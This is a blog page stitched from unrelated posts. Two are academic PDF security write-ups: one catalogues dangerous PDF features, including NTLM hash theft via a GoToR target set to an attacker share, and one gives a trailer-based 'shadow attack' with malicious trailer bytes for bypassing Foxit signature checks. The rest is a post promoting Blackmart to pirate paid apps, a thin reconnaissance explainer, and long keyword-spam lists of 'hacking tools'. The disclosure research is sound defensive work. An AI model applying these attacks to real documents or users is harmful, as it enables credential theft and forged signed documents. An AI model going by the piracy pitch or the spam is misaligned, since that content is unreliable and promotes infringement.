31 may 2023

Insecure Features In PDFs

In 2019, we published attacks on PDF Signatures and PDF Encryption. During our research and studying the related work, we discovered a lot of blog posts, talks, and papers focusing on malicious PDFs causing some damage. However, there was no systematic analysis of all possible dangerous features supported by PDFs, but only isolated exploits and attack concepts.

We decided to fill this gap and systematize the possibilities to use legitimate PDF features and do bad stuff. We define four attack categories: Denial of Service, Information Disclosure, Data Manipulation, and Code Execution.

Our evaluation reveals 26 of 28 popular PDF processing applications are vulnerable to at least one attack. You can download all malicious PDFs here. You can also find more technical details in our NDSS'21 paper.

This is a joined work of Jens Müller, Dominik Noss, Christian Mainka, Vladislav Mladenov, and Jörg Schwenk.

Dangerous Paths: Overview

To identify attack vectors, we systematically surveyed which potentially dangerous features exist in the PDF specification. We created a comprehensive list with all PDF Actions that can be called. This list contains 18 different actions that we carefully studied.
 
 
We selected eight actions – the ones that directly or indirectly allow access to a file handle and may therefore be abused for dangerous features such as URL invocation or writing to files. Having a list of security-sensitive actions, we proceeded by investigating all objects and related events that can trigger these actions.

We identified four PDF objects which allow calling arbitrary actions (Page, Annotation, Field, and Catalog). Most objects offer multiple alternatives for this purpose. For example, the Catalog object, defines the OpenAction or additional actions (AA) events. Each event can launch any sequence of PDF actions, for example, Launch, Thread, etc. JavaScript actions can be embedded within documents. It  opens a new area for attacks, for example, new annotations can be created that can have actions which once again lead to accessing file handles.

Denial of Service

The goal of the denial of service class of attacks is enforcing to process PDF applications in consuming all available resources (i.e., computing time or memory) or causes them to crash by opening a specially crafted PDF document. We identified two variants: Infinite Loop and Deflate Bomb.

Infinite Loop

This variant induces an endless loop causing the program execution to get stuck. The PDF standard allows various elements of the document structure to reference to themselves, or to other elements of the same type.

  • Action loop: PDF actions allow to specify a Next action to be performed, thereby resulting in "action cycles".
  • ObjStm loop: Object streams may extend other object streams allows the crafting of a document with cycles.
  • Outline loop: PDF documents may contain an outline. Its entries, however, can refer to themselves or each other.
  • Calculations: PDF defines "Type 4" calculator functions, for example, to transform colors. Processing hard-to-solve mathematical formulas may lead to high demands of CPU.
  • JavaScript: Finally, in case the PDF application processes scripts within documents, infinite loops can be induced.

Deflate Bomb

Data amplification attacks based on malicious zip archives are well-known. The first publicly documented DoS attack using a "zip bomb" was conducted in 1996 against a Fidonet BBS administrator. However, not only zip files but also stream objects within PDF documents can be compressed using various algorithms such as Deflate to reduce the overall file size. 

Information Disclosure

The goal of this class of attacks is to track the usage of a document by silently invoking a connection to the attacker's server once the file is opened, or to leak PDF document form data, local files, or NTLM credentials to the attacker.

URL Invocation

PDF documents that silently "phone home" should be considered as privacy-invasive. They can be used, for example, to deanonymize reviewers, journalists, or activists behind a shared mailbox. The attack's goal is to open a backchannel to an attacker-controlled server once the PDF file is opened by the victim.

The possibility of malicious URI resolving in PDF documents has been introduced by Hamon [1] who gave an evaluation for URI and SubmitForm actions in Acrobat Reader. We extend their analysis to all standard PDF features that allow opening a URL, such as ImportData, Launch, GoToR, and JavaScript.

Form Data Leakage

Documents can contain forms to be filled out by the user – a feature introduced with PDF version 1.2 in 1996 and used on a daily basis for routine offices tasks, such as travel authorization or vacation requests. The idea of this attack is as follows: The victim downloads a form – a PDF document which contains form fields – from an attacker controlled source and fills it out on the screen, for example, in order to print it. The form is manipulated by the attacker in such a way that it silently send input data to the attacker's server.

Local File Leakage

The PDF standard defines various methods to embed external files into a document or otherwise access files on the host's file system, as documented below.

  • External streams: Documents can contain stream objects (e.g., images) to be included from external files on disk.
  • Reference XObjects: This feature allows a document to import content from another (external) PDF document.
  • Open Prepress Interface: Before printing a document, local files can be defined as low-resolution placeholders.
  • Forms Data Format (FDF): Interactive form data can be stored in, and auto-imported from, external FDF files.
  • JavaScript functions: The Adobe JavaScript reference enables documents to read data from or import local files.

If a malicious document managed to firstly read files from the victim's disk and secondly, send them back to the attacker, such behavior would arguably be critical.

Credential Theft

In 1997, Aaron Spangler posted a vulnerability in Windows NT on the Bugtraq mailing list [2]: Any client program can trigger a connection to a rogue SMB server. If the server requests authentication, Windows will automatically try to log in with a hash of the user's credentials. Such captured NTLM hashes allow for efficient offline cracking and can be re-used by applying pass-the-hash or relay attacks to authenticate under the user's identity. In April 2018, Check Point Research [3] showed that similar attacks can be performed with malicious PDF files. They found that the target of GoToR and GoToE actions can be set to \\attacker.com\dummyfile, thereby leaking credentials in the form of NTLM hashes.

Data Manipulation

This attack class deals with the capabilities of malicious documents to silently modify form data, to write to local files on the host's file system, or to show a different content based on the application that is used to open the document.

Form Modification

The idea of this attack is as follows: Similar to Form Data Leakage attacks, the victim obtains a harmlessly looking PDF document from an attacker controlled source, for example, a remittance slip or a tax form. The goal of the attacker is to dynamically, and without knowledge of the victim, manipulate form field data.

File Write Access

The PDF standard enables documents to submit form data to external webservers. Technically the webserver's URL is defined using a PDF File Specification. This ambiguity in the standard may be interpreted by implementations in such a way that they enable documents to submit PDF form data to a local file, thereby writing to this file.
 

Content Masking 

The goal of this attack is to craft a document that renders differently, depending on the applied PDF interpreter. This can be used, for example, to show different content to different reviewers, to trick content filters (AI-based machines as well as human content moderators), plagiarism detection software, or search engines, which index a different text than the one shown to users when opening the document.

  • Stream confusion: It is unclear how content streams are parsed if their Length value does not match the offset of the endstream marker, or if syntax errors are introduced.
  • Object confusion: An object can overlay another object. The second object may not be processed if it has a duplicate object number, if it is not listed in the XRef table, or if other structural syntax errors are introduced.
  • Document confusion: A PDF file can contain yet another document (e.g., as embedded file), multiple XRef tables, etc., which results in ambiguities on the structural level.
  • PDF confusion: Objects before the PDF header or after an EOF marker may be processed by implementations, introducing ambiguities in the outer document structure.

Code Execution

The goal of this attack is to execute attacker-controlled code. This can be achieved by silently launching an executable file, embedded within the document, to infect the host with malware. The PDF specification defines the Launch action, which allows documents to launch arbitrary applications. The file to be launched can either be specified by a local path, a network share, a URL, or a file embedded within the PDF document itself.

Evaluation

Out of 28 tested applications, 26 are vulnerable to at least one attack.

Authors of this Post

Dominik Noss
Christian Mainka

Sources

1] V. Hamon. "Malicious URI resolving in PDF documents". In: Journal of Computer Virology and Hacking Techniques 9.2 (2013), pp. 65–76.

[2] Aaron Spangler. WinNT/Win95 Automatic Authentication Vulnerability (IE Bug #4). https://insecure.org/sploits/winnt.automatic.authentication.html. Mar. 1997.

[3] Check Point Research. NTLM Credentials Theft via PDF Files. https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/. 2018.



More information
Publicado por en No hay comentarios:

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

Android made endless possibilities for everyone. It introduced a platform where are millions of apps that a user can download and buy depending on their needs. You're thinking about Google PlayStore, yes I am also talking about Google PlayStore. It's categorized app collection depending on every niche of life. Few of them are free and some of them are paid. Most of the paid apps are only charges small cost in between $2 to $8, but few apps are highly costly that make cost over $50 even, which is not possible for every user to buy and get benefit from it. So, here I am sharing a really useful app, that can make every Google PlayStore app for you to download it for free. You can download any paid app that may even cost about $50. It's totally free. Download blackmart Android app and download google play store paid apps freely.

DOWNLOAD BLACKMART ANDROID APP – DOWNLOAD PLAYSTORE PAID APPS FREE

  • It's extremely easy to use.
  • It has a Multilingual option for a global user experience.
  • The app doesn't ask for any payments.
  • Capable to download full of downloadable applications.
  • Super fast in downloading and installation.
More articles
Publicado por en No hay comentarios:

30 may 2023

Shadow Attacks … The Smallest Attack Vector Ever

In July 2020, we introduced a novel attack class called Shadow Attacks. In our recent research, we discovered a new variant of the attack which relies only on an Incremental Update containing a malicious trailer.
A proof-of-concept exploit working on Foxit (Version: 11.0.1.49938) can be downloaded here.

The story so far ...

Shadow attacks are attacks bypassing the integrity protection of digitally signed PDF documents. The attacks abuse two legitimate features in PDF documents which we briefly explain.

Hiding Content

In PDFs, there are multiple techniques to hide content that is not displayed when the document is opened. We, as attackers, usually hide malicious objects without referencing them in the xref section.

Incremental Updates

New content can be appended to a signed PDF document. This is quite dangerous though. The digital signature in PDFs protects a specific range of bytes. Any appended content does not break the signature verification since it is outside this range. As a result, any new Incremental Update does not violate the cryptographic verification of the digital signature. 
But, Incremental Updates are quite dangerous since they may completely change the displayed content of the document. In 2019, we showed different techniques based on Incremental Updates – the Incremental Saving Attacks.
As a countermeasure, most vendors warn if additional content is added after signing the document. BUT … not always!!!
 
There are meaningful use cases where Incremental Updates in digitally signed documents are allowed. For instance, contracts should be signed by multiple parties and each new signature is applied via additional Incremental Update.
Also, PAdES defines Incremental Updates as part of the long-term validation of digitally signed PDFs.
In summary, Incremental Updates are painful from a security perspective. Currently, vendors are trying to estimate whether an Incremental Update is malicious or not by analyzing its content.

Shadow Attacks

Shadow attacks, in general, deceive the PDF applications that an Incremental Update is not malicious. This can be done by providing an Incremental Update with minimal content.
In 2020, we estimated that appending an xref section and a trailer is sufficient to bypass the detection mechanisms of popular applications such as Adobe Reader and Foxit Reader.

Trailer-based Shadow Attack

Three months ago, we tried to reduce the content of the malicious Incremental Update. Our idea was to use only a malicious trailer and still change the content of the entire document when it is opened. Let's see how this can be done. 


The Signer's view on the document

 If a signer gets the document depicted on the left side, he or she sees the content "Sign the document to get a reward".
The document contains a hidden content depicted as red text – the 4 0 obj containing the text "You are fired. Get out immediately" and an xref section pointing to that object. However, the trailer references another xref section, see (1) and (2). Thus, the red text is never shown.
From the signer's perspective, there is no possibility to detect the hidden content by opening and reviewing the document.
As a result, the signer, for example the company director, signs the document.

The Victim's view on the document

We assume that the attacker receives the signed document and manipulates it.
The attacker appends only a trailer that points to the hidden malicious xref section (the red one). When the victim opens the document, the content "You are fired. Get out immediately" is shown.
However, the digital signature validation does not throw any warning since … well … what could go wrong if only a trailer is appended.
 

Honest vs. Malicious Trailer

There are small differences between the honest and the malicious trailer– the byte position of the xref section. Now, the trailer points to the hidden xref section.
trailer
<<
/Size 23
/Prev 18735
/Root 13 0 R
]>>
Honest trailer
trailer
<<
/Size 23
/Prev 19192
/Root 13 0 R
]>>
Malicious trailer
 
 



Impact and Exploit

We successfully applied the new attack on Foxit Reader (Version: 11.0.1.49938). We promptly reported the vulnerability and provided a Proof-of-Concept (PoC) exploit, known as CVE-2021-40326.
Foxit acknowledged the attack and published a security fix with the new version Foxit Reader 11.1.
 
We are not aware of any further implementations vulnerable to this attack.
If you think that your application might be vulnerable to the attack, then just download the exploit and test on your own.
 

Authors of this post

Vladislav Mladenov

Simon Rohlmann

Christian Mainka

Related word


  1. How To Make Hacking Tools
  2. Bluetooth Hacking Tools Kali
  3. Hacker Tools List
  4. Computer Hacker
  5. Hacker Tools Hardware
  6. Hacker Tools
  7. Hack Tools Online
  8. Hacking Apps
  9. Hacking Tools Usb
  10. Hacker Tools For Pc
  11. Beginner Hacker Tools
  12. Pentest Recon Tools
  13. Hacking Tools 2019
  14. Hacker Tools Apk
  15. Growth Hacker Tools
  16. Hacking Tools Online
  17. Hack Tools For Mac
  18. Pentest Tools Subdomain
  19. What Are Hacking Tools
  20. Hacking Tools Mac
  21. Hacking Tools 2019
  22. Hacker Tools Software
  23. Bluetooth Hacking Tools Kali
  24. Nsa Hack Tools
  25. New Hack Tools
  26. Hacker Tools For Ios
  27. Free Pentest Tools For Windows
  28. Hacking Tools
  29. Hacker Tools Windows
  30. Hack Apps
  31. Hacker Techniques Tools And Incident Handling
  32. Hackrf Tools
  33. Hack And Tools
  34. Hacking Tools Kit
  35. Hacker Tools Online
  36. Ethical Hacker Tools
  37. Hacking Tools Hardware
  38. Pentest Tools Nmap
  39. Top Pentest Tools
  40. Pentest Tools Website Vulnerability
  41. Pentest Tools Windows
  42. Hacking Tools 2019
  43. Hackrf Tools
  44. Hackrf Tools
  45. Pentest Tools Website Vulnerability
  46. Hacking Tools Download
  47. Hacker Tools 2020
  48. Install Pentest Tools Ubuntu
  49. Pentest Tools List
  50. Hacking App
  51. Tools Used For Hacking
  52. Underground Hacker Sites
  53. Pentest Tools Download
  54. Hacking Tools And Software
  55. Hacker Tools Github
  56. Hacking Tools Usb
  57. Underground Hacker Sites
  58. Hacker Tools Mac
  59. Hacker Tools Hardware
  60. Hack Tools Pc
  61. Hack Tools 2019
  62. Wifi Hacker Tools For Windows
  63. Pentest Tools Port Scanner
  64. Pentest Tools Kali Linux
  65. Hacker Tools Github
  66. Pentest Tools For Android
  67. Best Pentesting Tools 2018
  68. Hack Tools 2019
  69. Pentest Box Tools Download
  70. Hack Tools Online
  71. Pentest Tools For Mac
  72. Hacker Tools Github
  73. Hacker Tools 2020
  74. Pentest Tools Online
  75. Pentest Tools Android
  76. Pentest Tools Kali Linux
  77. Pentest Tools Apk
  78. Hacker Tools Apk Download
  79. How To Install Pentest Tools In Ubuntu
  80. Hack Tools Github
  81. Hacking Tools For Beginners
Publicado por en No hay comentarios:

RECONNAISSANCE IN ETHICAL HACKING

What is reconnaissance in ethical hacking?
This is the primary phase of hacking where the hacker tries to collect as much information as possible about the target.It includes identifying the target ip address range,network,domain,mail server records etc.

 They are of two types-
Active Reconnaissance 
Passive Reconnaissance 

 1-Active Reconnaissance-It the process from which we directly interact with the computer system to gain information. This information can be relevant and accurate but there is a risk of getting detected if you are planning active reconnaissance without permission.if you are detected then the administration will take the severe action action against you it may be jail!

 Passive Reconnaissance-In this process you will not be directly connected to a computer system.This process is used to gather essential information without ever interacting with the target system.

Related word


  1. Hack Tools Online
  2. Pentest Recon Tools
  3. Wifi Hacker Tools For Windows
  4. Physical Pentest Tools
  5. Hack Tools Download
  6. Best Hacking Tools 2020
  7. Hacker Tools Apk
  8. Hacker Tools Free
  9. Pentest Tools Port Scanner
  10. Pentest Tools For Mac
  11. Usb Pentest Tools
  12. Hacker Tools For Windows
  13. Hacker Tools Github
  14. Hack Tools 2019
  15. Beginner Hacker Tools
  16. Hack Tools Download
  17. Hacking Tools Github
  18. Hak5 Tools
  19. Computer Hacker
  20. Pentest Tools Open Source
  21. Hacker Tools Hardware
  22. Hacking Apps
  23. Physical Pentest Tools
  24. Hacker Tools Linux
  25. Pentest Tools Framework
  26. Hack Tools For Games
  27. Hack Tools Download
  28. Hack Tools Pc
  29. Hacking Tools Hardware
  30. Hacking Tools 2019
  31. Pentest Tools Android
  32. Hacker Tools For Pc
  33. Hacking Tools Software
  34. Hacker Tools Software
  35. Pentest Tools
  36. Hacking Tools 2019
  37. Free Pentest Tools For Windows
  38. Hacking Tools
  39. Hacker Tools Free
  40. Hack Tool Apk No Root
  41. Hacking Tools Online
  42. Tools For Hacker
  43. Hacker Tools Free
  44. Hacking Tools Windows
  45. Black Hat Hacker Tools
  46. Hacker Tools For Mac
  47. Hacks And Tools
  48. Pentest Tools Alternative
  49. Ethical Hacker Tools
  50. Hack Tools Download
  51. Hack And Tools
  52. Hacking Tools For Mac
  53. Hacks And Tools
  54. Hack Tools Mac
  55. Physical Pentest Tools
  56. Hacking Tools For Windows Free Download
  57. What Is Hacking Tools
  58. Hacking Tools For Games
  59. Computer Hacker
  60. Hacker Tools List
  61. Physical Pentest Tools
  62. Hacker Search Tools
  63. Pentest Box Tools Download
  64. Hacking Tools Kit
  65. Hack Tools For Pc
  66. Android Hack Tools Github
  67. Pentest Tools Alternative
  68. Hacking Tools Windows
  69. Best Pentesting Tools 2018
  70. Tools For Hacker
  71. Android Hack Tools Github
  72. How To Hack
  73. Hacker
  74. Install Pentest Tools Ubuntu
  75. Hacking Tools Hardware
  76. Hacker Tools Windows
  77. Hacking Tools For Games
  78. Hacker Tools Apk
  79. Hacking Tools Hardware
  80. Hack Website Online Tool
  81. Hack Tools For Pc
  82. Hacker Hardware Tools
  83. Underground Hacker Sites
  84. Hack Tools For Pc
  85. Hack Tools Mac
  86. Wifi Hacker Tools For Windows
  87. Pentest Tools Windows
  88. How To Hack
  89. Hacking Tools Windows 10
  90. Hacker Techniques Tools And Incident Handling
  91. Hacker Tools Hardware
  92. Hack Rom Tools
  93. Hack Tools Mac
  94. Pentest Tools For Android
  95. Pentest Tools Review
  96. Free Pentest Tools For Windows
  97. Hack Tools Online
  98. Hack Tools For Ubuntu
  99. Hacker
  100. Hacker Security Tools
  101. New Hacker Tools
  102. Hack Tools For Pc
  103. Hacking Tools Kit
  104. Hacker Tools Software
  105. Hackers Toolbox
  106. Hacker Tools Free
  107. Growth Hacker Tools
  108. Hack Tools
  109. Hacker Tools 2019
  110. Hacking Tools For Kali Linux
  111. Game Hacking
  112. Hack Tools Download
  113. Hacker Tools Linux
  114. Hacker Tools Linux
  115. Hack Tools Pc
  116. Pentest Tools Windows
  117. Pentest Tools Free
  118. Hacks And Tools
  119. Beginner Hacker Tools
  120. Hack Tools Online
  121. Hack Tools
  122. Hacking Tools Kit
  123. Pentest Reporting Tools
  124. Pentest Tools Online
  125. Hack Tools For Ubuntu
  126. Hack Tools Pc
  127. Hacking Tools For Windows 7
  128. Hacking Tools 2019
  129. Hacking Tools Mac
  130. Hacker Tools Hardware
  131. Hack Tools For Windows
  132. Pentest Tools Apk
  133. Pentest Tools Website
  134. Wifi Hacker Tools For Windows
  135. Pentest Tools Subdomain
  136. What Are Hacking Tools
  137. Hacking Tools For Pc
  138. Hacker Tools Apk
  139. Top Pentest Tools
  140. Nsa Hack Tools
  141. New Hack Tools
  142. New Hacker Tools
  143. Pentest Reporting Tools
  144. Hacking Tools For Pc
  145. Install Pentest Tools Ubuntu
  146. Hacking Tools
  147. Hacker Tools Windows
  148. Hacker Tools
  149. Hack Tool Apk No Root
  150. Pentest Tools Apk
  151. Pentest Tools Find Subdomains
  152. Pentest Tools Free
  153. Hack Tools
  154. Hacking Tools Windows
Publicado por en No hay comentarios:
Suscribirse a: Entradas (Atom)